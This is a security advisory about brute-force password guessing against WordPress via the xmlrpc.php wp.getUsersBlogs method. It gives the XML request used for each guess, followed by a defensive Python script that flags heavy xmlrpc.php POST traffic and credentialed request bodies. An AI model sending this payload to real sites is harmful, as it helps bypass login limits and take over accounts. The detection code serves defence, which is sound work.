In recent days, members of the WordPress community have reported attacks that use xmlrpc.php for brute-force password guessing. Using the interface exposed by xmlrpc.php to guess user passwords bypasses WordPress's brute-force limits. Large-scale exploitation has already been observed, so anyone with xmlrpc enabled should fix this as soon as possible: install or upgrade the Login Security Solution plugin.
WordPress login endpoints usually have brute-force protection; for example, the FreeBuf login allows only 5 attempts.
This attack via xmlrpc.php bypasses those limits. The attack simply POSTs the following data to xmlrpc.php:

```xml
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value>username</value></param>
    <param><value>password</value></param>
  </params>
</methodCall>
```
Here the username field is a previously collected user name and password is the password being tried. More information on the getUsersBlogs interface is available in the official guide. If the password is correct, the response is:
If the password is wrong, the response is 403:
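The following is an added example, not code from the original post, showing how a site operator can spot this pattern from the defender's side: it counts POST requests to xmlrpc.php per source IP in a combined-format access log, and parses an XML-RPC request body (as captured by a WAF or request-logging module) to tell whether the call is a credentialed wp.getUsersBlogs request and which account it targets. The log lines and request body below are constructed samples; the threshold of 5 is an assumption borrowed from the per-login limit mentioned above, and since legitimate XML-RPC clients (mobile apps, remote publishing tools) also POST to this endpoint, the threshold should be tuned to the site's normal traffic.

```python
"""Detect XML-RPC password-guessing traffic against WordPress (added example)."""
import re
import xml.etree.ElementTree as ET
from collections import Counter

# Constructed sample of combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jul/2014:10:00:01 +0800] "POST /xmlrpc.php HTTP/1.1" 200 291 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2014:10:00:02 +0800] "POST /xmlrpc.php HTTP/1.1" 200 291 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2014:10:00:02 +0800] "POST /xmlrpc.php HTTP/1.1" 200 291 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2014:10:00:03 +0800] "POST /xmlrpc.php HTTP/1.1" 200 291 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2014:10:00:03 +0800] "POST /xmlrpc.php HTTP/1.1" 200 291 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jul/2014:10:00:04 +0800] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jul/2014:10:00:05 +0800] "POST /xmlrpc.php HTTP/1.1" 200 612 "-" "WordPress/3.9"
198.51.100.4 - - [10/Jul/2014:10:01:05 +0800] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Constructed XML-RPC body in the shape shown in the post (string-typed values).
SAMPLE_BODY = b"""<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value><string>admin</string></value></param>
    <param><value><string>guess1</string></value></param>
  </params>
</methodCall>
"""

# Methods whose first two params are (username, password); the post names wp.getUsersBlogs.
CREDENTIALED_METHODS = {"wp.getUsersBlogs"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def xmlrpc_posts_per_ip(log_text: str) -> Counter:
    """Count POST requests to xmlrpc.php per client IP (query strings ignored)."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path.endswith("/xmlrpc.php"):
            counts[m["ip"]] += 1
    return counts


def suspicious_ips(log_text: str, threshold: int = 5) -> list:
    """IPs that hit xmlrpc.php with POST at least `threshold` times (assumed limit)."""
    return sorted(ip for ip, n in xmlrpc_posts_per_ip(log_text).items() if n >= threshold)


def classify_xmlrpc_body(body: bytes) -> dict:
    """Parse an XML-RPC request and report the method, whether it carries
    credentials, and the targeted username (so defenders can see which
    accounts are being guessed against)."""
    empty = {"method": None, "credentialed": False, "username": None}
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return empty  # malformed XML is not a valid method call
    if root.tag != "methodCall":
        return empty
    method = (root.findtext("methodName") or "").strip()
    # <value> may wrap the text directly or in a typed child such as <string>.
    params = ["".join(v.itertext()).strip() for v in root.findall("./params/param/value")]
    credentialed = method in CREDENTIALED_METHODS and len(params) >= 2
    return {
        "method": method or None,
        "credentialed": credentialed,
        "username": params[0] if credentialed else None,
    }


if __name__ == "__main__":
    print("xmlrpc POSTs per IP:", dict(xmlrpc_posts_per_ip(SAMPLE_LOG)))
    print("suspicious IPs:", suspicious_ips(SAMPLE_LOG))
    print("sample body:", classify_xmlrpc_body(SAMPLE_BODY))
```

The log-based count deliberately ignores the response status, because the post's "returns 403" may show up as an HTTP status or as a fault code inside a 200 response depending on how the site logs XML-RPC traffic; the volume of POSTs to xmlrpc.php from one address is the signal that survives either way. The body classifier is what a WAF rule or request-logging hook would feed, and the username it extracts tells you which accounts to watch or force a password reset on.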